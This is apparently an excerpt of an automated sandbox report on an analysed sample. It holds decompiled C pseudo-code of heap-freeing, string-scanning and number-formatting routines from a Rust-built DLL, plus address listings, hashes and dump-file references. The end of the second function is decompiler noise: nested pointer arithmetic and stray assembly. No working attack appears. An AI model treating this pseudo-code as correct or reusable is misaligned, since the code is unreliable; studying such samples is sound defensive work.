													_t262 = _v64;
													_t195 = 0;
													_t160 = _v56;
													__eflags = _t160;
													if(_t160 != 0) {
														goto L81;
													} else {
													}
													goto L84;
												}
											} else {
												__eflags = _t192 - 0x201;
												if(_t192 < 0x201) {
													goto L68;
												} else {
													goto L65;
												}
												goto L69;
											}
										} else {
											_t171 = GetLastError();
											__eflags = _t171 - 0x7a;
											if(_t171 != 0x7a) {
												goto L63;
											} else {
												_t194 = _t194 + _t194;
												__eflags = _t194 - 0x201;
												if(_t194 < 0x201) {
													goto L68;
												} else {
													goto L65;
												}
												goto L69;
											}
										}
									} else {
										_t172 = GetLastError();
										__eflags = _t172;
										if(_t172 != 0) {
											_t195 = 1;
											_t173 = GetLastError();
											_t218 = 0;
											_t248 = _t173;
											_t160 = _v56;
											__eflags = _t160;
											if(_t160 != 0) {
												L81:
												__eflags = _v48;
												if(_v48 != 0) {
													__eflags = _t160 & 0x7fffffff;
													if((_t160 & 0x7fffffff) != 0) {
														_v44 = _t218;
														HeapFree( *0x6f28adc8, 0, _v48);
														_t218 = _v44;
													}
												}
											}
											L84:
											__eflags = _t195;
											if(_t195 == 0) {
												_t161 = _v76;
												 *_t161 = _t218;
												_t161[1] = _t248;
												_t161[2] = _t262;
											} else {
												__eflags = _t218 - 3;
												 *_v76 = 0;
												if(_t218 == 3) {
													_v20 = 4;
													_v44 = _t248;
													 *((intOrPtr*)( *((intOrPtr*)(_t248 + 4))))( *_t248);
													_t281 = _t281 + 4;
													_t267 = _v44;
													_t220 =  *((intOrPtr*)(_t267 + 4));
													__eflags =  *(_t220 + 4);
													if( *(_t220 + 4) != 0) {
														_t167 =  *_t267;
														__eflags =  *((intOrPtr*)(_t220 + 8)) - 9;
														if( *((intOrPtr*)(_t220 + 8)) >= 9) {
															_t167 =  *(_t167 - 4);
														}
														HeapFree( *0x6f28adc8, 0, _t167);
													}
													HeapFree( *0x6f28adc8, 0, _t267);
												}
											}
											__eflags = _v80 & 0x7fffffff;
											if((_v80 & 0x7fffffff) != 0) {
												HeapFree( *0x6f28adc8, 0, _v36);
											}
											goto L76;
										} else {
											goto L71;
										}
									}
								}
							} else {
								_t228 = _t242;
								_t268 = _t148;
								while(1) {
									__eflags =  *_t268;
									if( *_t268 == 0) {
										break;
									}
									__eflags =  *((short*)(_t268 + 2));
									if( *((short*)(_t268 + 2)) == 0) {
										break;
									} else {
										__eflags =  *((short*)(_t268 + 4));
										if( *((short*)(_t268 + 4)) == 0) {
											break;
										} else {
											__eflags =  *((short*)(_t268 + 6));
											if( *((short*)(_t268 + 6)) == 0) {
												break;
											} else {
												__eflags =  *((short*)(_t268 + 8));
												if( *((short*)(_t268 + 8)) == 0) {
													break;
												} else {
													__eflags =  *((short*)(_t268 + 0xa));
													if( *((short*)(_t268 + 0xa)) == 0) {
														break;
													} else {
														__eflags =  *((short*)(_t268 + 0xc));
														if( *((short*)(_t268 + 0xc)) == 0) {
															break;
														} else {
															__eflags =  *((short*)(_t268 + 0xe));
															if( *((short*)(_t268 + 0xe)) == 0) {
																break;
															} else {
																_t228 = _t228 + 0xfffffff8;
																_t268 = _t268 + 0x10;
																__eflags = _t228 - 7;
																if(_t228 > 7) {
																	continue;
																} else {
																	goto L45;
																}
															}
														}
													}
												}
											}
										}
									}
									goto L96;
								}
								L48:
								_t223 = _v68;
								_v56 = 0x6f27dec8;
								_v60 = 0x1402;
								__eflags = _t223;
								if(_t223 != 0) {
									__eflags = _t148;
									if(_t148 != 0) {
										__eflags = _t223 & 0x7fffffff;
										if((_t223 & 0x7fffffff) != 0) {
											HeapFree( *0x6f28adc8, 0, _t148);
										}
									}
								}
								__eflags = _v60 - 3;
								if(_v60 == 3) {
									_t224 = _v56;
									_v36 = _t224;
									_t70 = _t224 + 4; // 0x2c
									_v20 = 2;
									 *((intOrPtr*)( *_t70))( *_t224);
									_t281 = _t281 + 4;
									_t179 = _v36;
									_t226 =  *((intOrPtr*)(_t179 + 4));
									__eflags =  *(_t226 + 4);
									if( *(_t226 + 4) != 0) {
										_t181 =  *_t179;
										__eflags =  *((intOrPtr*)(_t226 + 8)) - 9;
										if( *((intOrPtr*)(_t226 + 8)) >= 9) {
											_t181 =  *(_t181 - 4);
										}
										HeapFree( *0x6f28adc8, 0, _t181);
										_t179 = _v56;
									}
									HeapFree( *0x6f28adc8, 0, _t179);
								}
								L75:
								 *_v76 = 0;
								L76:
								_t151 = _v28;
								 *[fs:0x0] = _t151;
								return _t151;
							}
							goto L96;
						}
					}
				} else {
					_t142 = GetProcessHeap();
					if(_t142 == 0) {
						L94:
						_t239 = 2;
						E6F256C30(_t192, 0xa, 2, _t245, _t262, __eflags);
						asm("ud2");
						L95:
						E6F256DB0(_t192, _t245, _t239, _t245, _t262, __eflags, 0x6f27ded0);
						asm("ud2");
						__eflags =  &_a8;
						E6F234AA0( *_v44,  *((intOrPtr*)(_v44 + 4)));
						return E6F23D420(_t263);
					} else {
						 *0x6f28adc8 = _t142;
						goto L3;
					}
				}
				L96:
			}







































































                          0x6f23d530
                          0x6f23d530
                          0x6f23d530
                          0x6f23d533
                          0x6f23d534
                          0x6f23d535
                          0x6f23d536
                          0x6f23d53c
                          0x6f23d53f
                          0x6f23d546
                          0x6f23d54d
                          0x6f23d55a
                          0x6f23d55d
                          0x6f23d563
                          0x6f23d56a
                          0x6f23d57e
                          0x6f23d583
                          0x6f23d58a
                          0x00000000
                          0x6f23d590
                          0x6f23d590
                          0x6f23d596
                          0x6f23d59b
                          0x6f23d59d
                          0x6f23d5a2
                          0x6f23d5a8
                          0x6f23d5b2
                          0x6f23d5bc
                          0x6f23d5ed
                          0x6f23d5f0
                          0x6f23d5f3
                          0x00000000
                          0x00000000
                          0x6f23d5f5
                          0x6f23d5fc
                          0x6f23d604
                          0x6f23d5df
                          0x6f23d5df
                          0x6f23d5e2
                          0x6f23d5e6
                          0x6f23d5e7
                          0x00000000
                          0x6f23d606
                          0x6f23d63a
                          0x6f23d644
                          0x6f23d647
                          0x6f23d64e
                          0x6f23d659
                          0x6f23d662
                          0x6f23d66a
                          0x6f23d66d
                          0x6f23d671
                          0x6f23d676
                          0x6f23d5d0
                          0x6f23d5d6
                          0x6f23d5d9
                          0x6f23d5dc
                          0x00000000
                          0x6f23d5dc
                          0x6f23d610
                          0x6f23d616
                          0x6f23d618
                          0x6f23d61e
                          0x6f23d621
                          0x6f23d624
                          0x6f23d627
                          0x6f23d629
                          0x6f23d681
                          0x6f23d68a
                          0x6f23d68c
                          0x6f23d6b3
                          0x6f23d6bb
                          0x6f23d6be
                          0x6f23d6c3
                          0x6f23d6c6
                          0x00000000
                          0x6f23d6c8
                          0x6f23d6c8
                          0x6f23d6cc
                          0x6f23d6d2
                          0x6f23d6d4
                          0x6f23d6da
                          0x00000000
                          0x6f23d6e0
                          0x00000000
                          0x6f23d6e0
                          0x6f23d6da
                          0x6f23d68e
                          0x6f23d68e
                          0x6f23d692
                          0x6f23d695
                          0x6f23d698
                          0x6f23d69b
                          0x6f23d6eb
                          0x6f23d6ed
                          0x6f23d6f3
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6f23d69d
                          0x6f23d6a3
                          0x6f23d6a5
                          0x6f23d715
                          0x6f23d715
                          0x6f23d717
                          0x6f23d6a7
                          0x6f23d6ab
                          0x6f23d6ae
                          0x6f23d6ae
                          0x6f23d71a
                          0x6f23d71d
                          0x6f23d71f
                          0x6f23d722
                          0x6f23d745
                          0x6f23d747
                          0x6f23d74a
                          0x6f23d750
                          0x00000000
                          0x6f23d752
                          0x00000000
                          0x6f23d752
                          0x6f23d724
                          0x6f23d724
                          0x6f23d72d
                          0x6f23d72f
                          0x6f23d75a
                          0x6f23d75a
                          0x6f23d75c
                          0x6f23d731
                          0x6f23d737
                          0x6f23d73a
                          0x6f23d73a
                          0x6f23d76f
                          0x6f23d771
                          0x6f23d774
                          0x6f23d77a
                          0x6f23d6f9
                          0x6f23d6f9
                          0x6f23d6fc
                          0x6f23d6fe
                          0x6f23d704
                          0x00000000
                          0x6f23d70a
                          0x00000000
                          0x6f23d70a
                          0x6f23d780
                          0x6f23d780
                          0x6f23d780
                          0x6f23d786
                          0x6f23d7a0
                          0x6f23d7a3
                          0x6f23d7a6
                          0x6f23d7a8
                          0x6f23d7ab
                          0x6f23d7b1
                          0x00000000
                          0x6f23d7b7
                          0x00000000
                          0x6f23d7b7
                          0x6f23d7b1
                          0x6f23d77a
                          0x6f23d722
                          0x6f23d69b
                          0x6f23d62b
                          0x6f23d62b
                          0x6f23d62d
                          0x6f23d630
                          0x6f23d632
                          0x6f23d638
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6f23d638
                          0x00000000
                          0x6f23d629
                          0x6f23d7bc
                          0x6f23d7c2
                          0x6f23d7ca
                          0x6f23d7cd
                          0x6f23d7d2
                          0x6f23d7d5
                          0x6f23d7d7
                          0x6f23d7da
                          0x6f23d7dc
                          0x6f23d824
                          0x6f23d824
                          0x6f23d826
                          0x6f23d830
                          0x6f23d830
                          0x6f23d832
                          0x00000000
                          0x00000000
                          0x6f23d838
                          0x6f23d83b
                          0x6f23d83f
                          0x6f23d842
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6f23d842
                          0x6f23d8d0
                          0x6f23d8d3
                          0x6f23d8d5
                          0x6f23d8e1
                          0x6f23d8e6
                          0x6f23d8e9
                          0x6f23d8ec
                          0x6f23d8ec
                          0x6f23d8ef
                          0x6f23d8f5
                          0x6f23d8fa
                          0x6f23d8ff
                          0x6f23d902
                          0x6f23d904
                          0x6f23d907
                          0x00000000
                          0x6f23d90d
                          0x6f23d910
                          0x6f23d921
                          0x6f23d926
                          0x6f23d929
                          0x6f23d92e
                          0x6f23d933
                          0x6f23d935
                          0x6f23d938
                          0x6f23d93f
                          0x6f23d942
                          0x6f23d949
                          0x6f23d94f
                          0x6f23d972
                          0x6f23d977
                          0x6f23d97b
                          0x6f23d97d
                          0x6f23d97f
                          0x6f23d982
                          0x6f23d98f
                          0x6f23d994
                          0x6f23d99a
                          0x6f23d99d
                          0x6f23d99d
                          0x6f23d9a0
                          0x6f23d9a3
                          0x6f23d9a5
                          0x6f23d9a8
                          0x6f23d951
                          0x6f23d9b0
                          0x6f23d9b0
                          0x6f23d9b6
                          0x6f23d9b6
                          0x6f23d9bd
                          0x6f23d9bd
                          0x6f23d9c2
                          0x6f23d9cd
                          0x6f23d9d3
                          0x6f23d9d5
                          0x6f23d9d7
                          0x6f23d9e3
                          0x6f23d9e3
                          0x6f23d9e5
                          0x6f23d960
                          0x6f23d960
                          0x6f23d962
                          0x6f23d964
                          0x6f23da26
                          0x6f23da29
                          0x6f23da30
                          0x6f23da32
                          0x00000000
                          0x6f23da38
                          0x6f23da3e
                          0x6f23da3f
                          0x6f23da44
                          0x6f23da47
                          0x6f23da4a
                          0x6f23da4d
                          0x6f23da50
                          0x6f23da52
                          0x6f23da55
                          0x6f23da57
                          0x00000000
                          0x00000000
                          0x6f23da59
                          0x00000000
                          0x6f23da57
                          0x6f23d96a
                          0x6f23d96a
                          0x6f23d970
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6f23d970
                          0x6f23d9eb
                          0x6f23d9eb
                          0x6f23d9f1
                          0x6f23d9f4
                          0x00000000
                          0x6f23d9fa
                          0x6f23d9fa
                          0x6f23d9fc
                          0x6f23da02
                          0x00000000
                          0x6f23da04
                          0x00000000
                          0x6f23da04
                          0x00000000
                          0x6f23da02
                          0x6f23d9f4
                          0x6f23d9d9
                          0x6f23d9d9
                          0x6f23d9df
                          0x6f23d9e1
                          0x6f23da5b
                          0x6f23da5d
                          0x6f23da63
                          0x6f23da65
                          0x6f23da67
                          0x6f23da6a
                          0x6f23da6c
                          0x6f23da6e
                          0x6f23da6e
                          0x6f23da72
                          0x6f23da74
                          0x6f23da79
                          0x6f23da86
                          0x6f23da89
                          0x6f23da8e
                          0x6f23da8e
                          0x6f23da79
                          0x6f23da72
                          0x6f23da91
                          0x6f23da91
                          0x6f23da93
                          0x6f23daed
                          0x6f23daf0
                          0x6f23daf2
                          0x6f23daf5
                          0x6f23da95
                          0x6f23da98
                          0x6f23da9b
                          0x6f23daa1
                          0x6f23daa8
                          0x6f23dab0
                          0x6f23dab3
                          0x6f23dab5
                          0x6f23dab8
                          0x6f23dabb
                          0x6f23dabe
                          0x6f23dac2
                          0x6f23dac4
                          0x6f23dac6
                          0x6f23daca
                          0x6f23dacc
                          0x6f23dacc
                          0x6f23dad8
                          0x6f23dad8
                          0x6f23dae6
                          0x6f23dae6
                          0x6f23daa1
                          0x6f23daf8
                          0x6f23daff
                          0x6f23db10
                          0x6f23db10
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6f23d9e1
                          0x6f23d9d7
                          0x6f23d7de
                          0x6f23d7de
                          0x6f23d7e0
                          0x6f23d7e2
                          0x6f23d7e2
                          0x6f23d7e6
                          0x00000000
                          0x00000000
                          0x6f23d7e8
                          0x6f23d7ed
                          0x00000000
                          0x6f23d7ef
                          0x6f23d7ef
                          0x6f23d7f4
                          0x00000000
                          0x6f23d7f6
                          0x6f23d7f6
                          0x6f23d7fb
                          0x00000000
                          0x6f23d7fd
                          0x6f23d7fd
                          0x6f23d802
                          0x00000000
                          0x6f23d804
                          0x6f23d804
                          0x6f23d809
                          0x00000000
                          0x6f23d80b
                          0x6f23d80b
                          0x6f23d810
                          0x00000000
                          0x6f23d812
                          0x6f23d812
                          0x6f23d817
                          0x00000000
                          0x6f23d819
                          0x6f23d819
                          0x6f23d81c
                          0x6f23d81f
                          0x6f23d822
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6f23d822
                          0x6f23d817
                          0x6f23d810
                          0x6f23d809
                          0x6f23d802
                          0x6f23d7fb
                          0x6f23d7f4
                          0x00000000
                          0x6f23d7ed
                          0x6f23d844
                          0x6f23d844
                          0x6f23d847
                          0x6f23d84e
                          0x6f23d855
                          0x6f23d857
                          0x6f23d859
                          0x6f23d85b
                          0x6f23d85d
                          0x6f23d863
                          0x6f23d86e
                          0x6f23d86e
                          0x6f23d863
                          0x6f23d85b
                          0x6f23d873
                          0x6f23d877
                          0x6f23d87d
                          0x6f23d882
                          0x6f23d885
                          0x6f23d888
                          0x6f23d890
                          0x6f23d892
                          0x6f23d895
                          0x6f23d898
                          0x6f23d89b
                          0x6f23d89f
                          0x6f23d8a1
                          0x6f23d8a3
                          0x6f23d8a7
                          0x6f23d8a9
                          0x6f23d8a9
                          0x6f23d8b5
                          0x6f23d8ba
                          0x6f23d8ba
                          0x6f23d8c6
                          0x6f23d8c6
                          0x6f23da09
                          0x6f23da0c
                          0x6f23da12
                          0x6f23da12
                          0x6f23da15
                          0x6f23da25
                          0x6f23da25
                          0x00000000
                          0x6f23d7dc
                          0x6f23d5ed
                          0x6f23d56c
                          0x6f23d56c
                          0x6f23d573
                          0x6f23db1a
                          0x6f23db1f
                          0x6f23db24
                          0x6f23db29
                          0x6f23db2b
                          0x6f23db32
                          0x6f23db3a
                          0x6f23db44
                          0x6f23db4f
                          0x6f23db5f
                          0x6f23d579
                          0x6f23d579
                          0x00000000
                          0x6f23d579
                          0x6f23d573
                          0x00000000

                          APIs
                          • GetProcessHeap.KERNEL32 ref: 6F23D56C
                          • HeapAlloc.KERNEL32(03230000,00000000,0000000A), ref: 6F23D583
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.641042475.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000004.00000002.641004987.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641140882.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641221834.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641232429.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641246076.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: Heap$AllocProcess
                          • String ID: RUST_BACKTRACE
                          • API String ID: 1617791916-3454309823
                          • Opcode ID: 9d251eec66f0067093a87a357a903c331de8a4084c9ed90bcf010b0dafe20a80
                          • Instruction ID: 7ce88c56821cf0cd2824397c00232cae40842050e2ed89600fc0764bbe9a9c7f
                          • Opcode Fuzzy Hash: 9d251eec66f0067093a87a357a903c331de8a4084c9ed90bcf010b0dafe20a80
                          • Instruction Fuzzy Hash: 98029CF2E0022D8BDB14CFA8C984BDDB7B2BF49314F94411AD825AB380D7B5A945CF91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F2377B4, Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 423COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 81%
                          			E6F2377B4(signed int __ecx, void* __eflags) {
				intOrPtr _t127;
				signed int _t129;
				signed int _t130;
				signed int _t131;
				signed int _t133;
				void* _t134;
				intOrPtr* _t136;
				intOrPtr* _t138;
				intOrPtr* _t140;
				intOrPtr* _t150;
				intOrPtr* _t153;
				intOrPtr* _t154;
				signed int* _t155;
				signed int _t157;
				signed int _t158;
				signed int _t162;
				signed int _t164;
				signed int _t165;
				signed int _t167;
				signed int _t170;
				signed int _t171;
				void* _t173;
				void* _t175;
				signed int _t176;
				signed int _t180;
				signed int _t181;
				signed int _t183;
				signed int _t184;
				signed int _t196;
				void* _t198;
				void* _t200;
				signed char _t201;
				signed int* _t203;
				signed char _t204;
				signed int _t207;
				signed char _t208;
				intOrPtr _t212;
				signed int _t215;
				signed int _t216;
				signed int _t218;
				char* _t220;
				char* _t221;
				signed int _t222;
				signed int _t225;
				signed int _t226;
				signed int _t238;
				signed int _t239;
				signed int _t241;
				signed int _t245;
				intOrPtr _t250;
				signed char _t251;
				signed int _t258;
				intOrPtr _t268;
				unsigned int _t273;
				void* _t281;
				char* _t282;
				signed short _t286;
				signed int _t288;
				signed int _t290;
				signed int _t291;
				signed int _t292;
				char* _t295;
				signed int _t303;
				signed int _t307;
				void* _t308;
				void* _t311;
				void* _t312;
				signed int* _t313;
				void* _t316;

				_pop(_t127);
				if(__eflags != 0) {
					 *((intOrPtr*)(_t308 + 0x10)) = _t250;
					_t251 =  *(__ecx + 4);
					 *((intOrPtr*)(_t308 + 0x14)) = _t127;
					 *(_t308 + 4) = __ecx;
					__eflags = _t251;
					if(_t251 == 0) {
						L19:
						_t288 =  *(_t308 + 4);
						_t214 =  *(_t288 + 0x14);
						__eflags =  *(_t288 + 0x14);
						if( *(_t288 + 0x14) == 0) {
							L21:
							 *_t288 = 1;
							goto L22;
						} else {
							_push(0x10);
							_t129 = E6F231DE0(_t214,  &M6F27CB85);
							_t215 = 1;
							__eflags = _t129;
							if(_t129 == 0) {
								goto L21;
							}
						}
						goto L23;
					} else {
						_t130 =  *(_t308 + 4);
						_t216 =  *(_t130 + 0xc);
						_t131 =  *(_t130 + 8);
						__eflags = _t216 - _t131;
						 *(_t308 + 0xc) = _t216;
						 *(_t308 + 8) = _t131;
						if(_t216 < _t131) {
							_t290 =  *(_t308 + 4);
							_t279 = 0xffffffff;
							_t133 =  *(_t308 + 0xc) + 1;
							__eflags = _t133;
							_t218 =  ~( *(_t308 + 8));
							while(1) {
								__eflags = _t218 + _t133 - 1;
								if(_t218 + _t133 == 1) {
									goto L19;
								}
								_t196 =  *(_t251 + _t133 - 1) & 0x000000ff;
								 *(_t290 + 0xc) = _t133;
								_t133 = _t133 + 1;
								_t279 = _t279 + 1;
								_t198 = _t196 + 0xd0;
								__eflags = _t198 - 0xa;
								if(_t198 < 0xa) {
									continue;
								} else {
									_t200 = _t198 + 0x9f;
									__eflags = _t200 - 6;
									if(_t200 < 6) {
										continue;
									} else {
										__eflags = _t200 - 0x5f;
										if(_t200 != 0x5f) {
											goto L19;
										} else {
											_t291 =  *(_t308 + 0xc);
											_t134 = _t133 + 0xfffffffe;
											_t201 = _t251;
											__eflags = _t134 - _t291;
											if(_t134 < _t291) {
												L38:
												E6F256F60(_t201,  *(_t308 + 8), _t291, _t134, 0x6f27cb2c);
												_t311 = _t308 + 0xc;
												asm("ud2");
												goto L39;
											} else {
												__eflags = _t291;
												if(_t291 == 0) {
													L13:
													_t209 = _t201 + _t291;
													_t268 = _t308 + 0x18;
													 *((intOrPtr*)(_t308 + 0x18)) = _t201 + _t291;
													 *(_t308 + 0x1c) = _t279;
													E6F238720(_t308 + 0x20, _t268);
													__eflags =  *(_t308 + 0x20);
													if( *(_t308 + 0x20) == 0) {
														_t291 =  *( *(_t308 + 4) + 0x14);
														__eflags = _t291;
														if(_t291 == 0) {
															goto L22;
														} else {
															_push(2);
															_t180 = E6F231DE0(_t291, 0x6f27cc17);
															_t316 = _t308 + 4;
															_t215 = 1;
															__eflags = _t180;
															if(_t180 != 0) {
																goto L23;
															} else {
																_push(_t279);
																_t181 = E6F231DE0(_t291, _t209);
																_t215 = 1;
																_t311 = _t316 + 4;
																goto L34;
															}
														}
													} else {
														_t183 =  *( *(_t308 + 4) + 0x14);
														__eflags = _t183;
														if(_t183 == 0) {
															goto L22;
														} else {
															 *(_t308 + 8) = _t183;
															_t212 =  *((intOrPtr*)(_t308 + 0x2c));
															_t184 =  *(_t308 + 0x28);
															__eflags = _t184 - 0x2710;
															asm("sbb ecx, 0x0");
															if(_t184 < 0x2710) {
																_t238 = 0x27;
															} else {
																_t241 = 0x27;
																asm("o16 nop [cs:eax+eax]");
																do {
																	 *(_t308 + 4) = _t241;
																	 *(_t308 + 0xc) = _t184;
																	_t286 = E6F249F10(_t184, _t212, 0x2710, 0);
																	_t184 = E6F249F90(_t184, _t212, 0x2710, 0);
																	_t245 = ((_t286 & 0x0000ffff) >> 2) * 0x147b >> 0x11;
																	__eflags = 0x5f5e0ff -  *(_t308 + 0xc);
																	asm("sbb esi, ebx");
																	_t303 =  *(_t308 + 4);
																	_t212 = _t268;
																	 *((short*)(_t308 + _t303 + 0x31)) =  *(_t245 + _t245 + 0x6f27b61c) & 0x0000ffff;
																	 *((short*)(_t308 + _t303 + 0x33)) =  *((_t286 - _t245 * 0x00000064 & 0x0000ffff) + (_t286 - _t245 * 0x00000064 & 0x0000ffff) + 0x6f27b61c) & 0x0000ffff;
																	_t241 = _t303 - 4;
																} while (0x5f5e0ff <  *(_t308 + 0xc));
															}
															_t279 =  *(_t308 + 8);
															__eflags = _t184 - 0x63;
															if(_t184 > 0x63) {
																_t273 = _t184 & 0x0000ffff;
																_t184 = (_t273 >> 2) * 0x147b >> 0x11;
																 *((short*)(_t308 + _t238 + 0x33)) =  *((_t273 - _t184 * 0x00000064 & 0x0000ffff) + (_t273 - _t184 * 0x00000064 & 0x0000ffff) + 0x6f27b61c) & 0x0000ffff;
																_t238 = _t238 + 0xfffffffe;
																__eflags = _t238;
															}
															__eflags = _t184 - 0xa;
															if(_t184 >= 0xa) {
																 *((short*)(_t308 + _t238 + 0x33)) =  *(_t184 + _t184 + 0x6f27b61c) & 0x0000ffff;
																_t239 = _t238 + 0xfffffffe;
																__eflags = _t239;
															} else {
																 *((char*)(_t308 + _t238 + 0x34)) = _t184 + 0x30;
																_t239 = _t238 - 1;
															}
															__eflags = 0x27;
															_push(0x27 - _t239);
															_t291 = _t279;
															_push(_t308 + _t239 + 0x35);
															_push(0);
															_t181 = E6F231AA0(_t279, 0x6f27cd60);
															_t311 = _t308 + 0xc;
															_t215 = 1;
															L34:
															__eflags = _t181;
															if(_t181 != 0) {
																goto L23;
															} else {
																__eflags =  *_t291 & 0x00000004;
																if(( *_t291 & 0x00000004) != 0) {
																	goto L22;
																} else {
																	_t201 =  *((intOrPtr*)(_t311 + 0x10)) + 0x9f;
																	__eflags = _t201 - 0x19;
																	if(__eflags <= 0) {
																		_t279 = _t201 & 0x000000ff;
																		_t134 = 4;
																		_t201 =  *((intOrPtr*)(_t311 + 0x14)) +  *((intOrPtr*)(0x6f237b98 + (_t201 & 0x000000ff) * 4));
																		goto __ebx;
																	}
																	L39:
																	_t220 = "called `Option::unwrap()` on a `None` value";
																	_t136 = E6F256E20(_t201, _t220, 0x2b, _t279, _t291, __eflags, 0x6f27cc1c);
																	_t312 = _t311 + 4;
																	asm("ud2");
																	asm("stosb");
																	 *((intOrPtr*)(_t220 - 0x46fffffd)) =  *((intOrPtr*)(_t220 - 0x46fffffd)) + _t201;
																	_t138 = _t136 +  *_t136 +  *((intOrPtr*)(_t136 +  *_t136));
																	_t140 = _t138 +  *_t138 +  *((intOrPtr*)(_t138 +  *_t138));
																	_t221 =  &(_t220[_t140]);
																	_t203 = _t201 + _t138 + _t201 + _t138;
																	 *_t291 =  *_t291 + _t221;
																	 *0x2b =  *0x2b + _t203;
																	_t150 = _t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56)) +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56)))) +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56)) +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56)))))) + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56)) +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56)))) +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56)) +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56)))))) + _t221)) +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56)) +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56)))) +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56)) +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56)))))) + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56)) +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56)))) +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56)) +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56)))))) + _t221))));
																	 *_t291 =  *_t291 + _t150;
																	 *0x2b =  *0x2b + 0x56;
																	 *_t221 =  *_t221 + _t203;
																	_t153 = _t150 +  *_t150 +  *((intOrPtr*)(_t150 +  *_t150)) +  *((intOrPtr*)(_t150 +  *_t150 +  *((intOrPtr*)(_t150 +  *_t150))));
																	 *((intOrPtr*)(_t153 + 3)) =  *((intOrPtr*)(_t153 + 3)) + _t153;
																	 *_t153 =  *_t153 + _t153;
																	asm("enter 0x3, 0x0");
																	asm("enter 0x3, 0x0");
																	_t154 = _t153 +  *_t153;
																	_t203[0] = _t203[0] + 0x56;
																	 *_t154 =  *_t154 + _t154;
																	_pop(_t281);
																	_t155 = _t154 +  *_t154;
																	_t203[0] = _t203[0] + _t221;
																	 *_t155 = _t155 +  *_t155;
																	__eflags =  *_t155;
